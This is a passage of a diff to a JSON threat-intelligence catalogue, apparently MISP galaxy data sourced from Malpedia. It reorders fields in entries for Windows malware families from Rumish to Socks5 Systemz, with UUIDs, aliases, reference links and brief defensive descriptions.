"https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", - "value": "Rumish", - "description": "" + "value": "Rumish" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "" + "value": "running_rat" }, { + "description": "", "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] + ], + "synonyms": [ + "RCSU" + ], + "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "" + "value": "Rurktar" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "https://www.secureworks.com/blog/research-21041", @@ -12457,78 +12459,78 @@ "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "" + "value": "Rustock" }, { + "description": "", "meta": { - "synonyms": [ - "Saga" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", "http://malware-traffic-analysis.net/2017/10/13/index.html" - ] + ], + "synonyms": [ + "Saga" + ], + "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "" + "value": "SAGE" }, { + "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", "https://www.secureworks.com/research/sakula-malware-family" - ] + ], + "synonyms": [ + "Sakurel" + ], + "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer." + "value": "Sakula RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "" + "value": "Salgorea" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", - "value": "Sality", - "description": "" + "value": "Sality" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", @@ -12536,207 +12538,202 @@ "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "" + "value": "SamSam" }, { + "description": "", "meta": { - "synonyms": [ - "Daws" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] + ], + "synonyms": [ + "Daws" + ], + "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "" + "value": "Sanny" }, { + "description": "", "meta": { - "synonyms": [ - "Hussarini" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" - ] + ], + "synonyms": [ + "Hussarini" + ], + "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "" + "value": "Sarhust" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware", - "description": "" + "value": "Satan Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://www.cylance.com/threat-spotlight-satan-raas" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "" + "value": "Satana" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "" + "value": "Sathurbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "" + "value": "ScanPOS" }, { + "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." + "value": "Schneiken" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "" + "value": "Scote" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", - "value": "ScreenLocker", - "description": "" + "value": "ScreenLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "" + "value": "SeaDaddy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "" + "value": "SeaSalt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "" + "value": "SeDll" }, { + "description": "", "meta": { - "synonyms": [ - "azzy", - "eviltoss" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" - ] + ], + "synonyms": [ + "azzy", + "eviltoss" + ], + "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "" + "value": "Sedreco" }, { + "description": "", "meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "downrage", - "carberplike" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", @@ -12750,183 +12747,186 @@ "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" - ] + ], + "synonyms": [ + "jhuhugit", + "jkeyskw", + "downrage", + "carberplike" + ], + "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "" + "value": "Seduploader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "" + "value": "SendSafe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "" + "value": "Serpico" }, { + "description": "", "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] + ], + "synonyms": [ + "XShellGhost" + ], + "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "" + "value": "ShadowPad" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "" + "value": "Shakti" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", - "value": "SHAPESHIFT", - "description": "" + "value": "SHAPESHIFT" }, { + "description": "", "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] + ], + "synonyms": [ + "remotecmd" + ], + "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "" + "value": "shareip" }, { + "description": "", "meta": { - "synonyms": [ - "Bitrep" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", "https://eromang.zataz.com/tag/agentbase-exe/" - ] + ], + "synonyms": [ + "Bitrep" + ], + "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", - "value": "SHARPKNOT", - "description": "" + "value": "SHARPKNOT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "" + "value": "ShellLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "" + "value": "Shifu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "" + "value": "Shim RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", "http://www.nyxbone.com/malware/chineseRansom.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "" + "value": "Shujin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "" + "value": "Shurl0ckr" }, { + "description": "", "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", @@ -12935,112 +12935,123 @@ "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" - ] + ], + "synonyms": [ + "Caphaw" + ], + "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "" + "value": "Shylock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", - "value": "win.sidewinder", - "description": "" + "value": "win.sidewinder" }, { + "description": "", "meta": { - "synonyms": [ - "Destover" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] + ], + "synonyms": [ + "Destover" + ], + "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "" + "value": "Sierra(Alfa,Bravo, ...)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", - "value": "Siggen6", - "description": "" + "value": "Siggen6" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "https://securelist.com/the-silence/83009/", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "" + "value": "Silence" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "" + "value": "Silon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", - "value": "Siluhdur", - "description": "" + "value": "Siluhdur" }, { + "description": "", "meta": { - "synonyms": [ - "iBank" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://secrary.com/ReversingMalware/iBank/" - ] + ], + "synonyms": [ + "iBank" + ], + "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "" + "value": "Simda" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ], "synonyms": [ "Theola", "Quarian", @@ -13048,107 +13059,96 @@ "Anserin", "Torpig" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", - "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", - "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" - ] + "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", - "value": "Sinowal", - "description": "" + "value": "Sinowal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "" + "value": "Sisfader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "" + "value": "Skarab Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "" + "value": "Skyplex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", - "value": "Slave", - "description": "" + "value": "Slave" }, { + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + "value": "Slingshot" }, { + "description": "", "meta": { - "synonyms": [ - "speccom" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] + ], + "synonyms": [ + "speccom" + ], + "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "" + "value": "smac" }, { + "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { - "synonyms": [ - "Dofoil" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", @@ -13163,218 +13163,220 @@ "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" - ] + ], + "synonyms": [ + "Dofoil" + ], + "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", - "value": "SmokeLoader", - "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." + "value": "SmokeLoader" }, { + "description": "", "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] + ], + "synonyms": [ + "Ismo" + ], + "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "" + "value": "Smominru" }, { + "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", - "value": "SnatchLoader", - "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." + "value": "SnatchLoader" }, { + "description": "", "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] + ], + "synonyms": [ + "ByeByeShell" + ], + "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "" + "value": "SNEEPY" }, { + "description": "", "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] + ], + "synonyms": [ + "Ursnif" + ], + "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "" + "value": "Snifula" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "" + "value": "Snojan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "" + "value": "SNS Locker" }, { + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", - "value": "Sobaken", - "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." + "value": "Sobaken" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "" + "value": 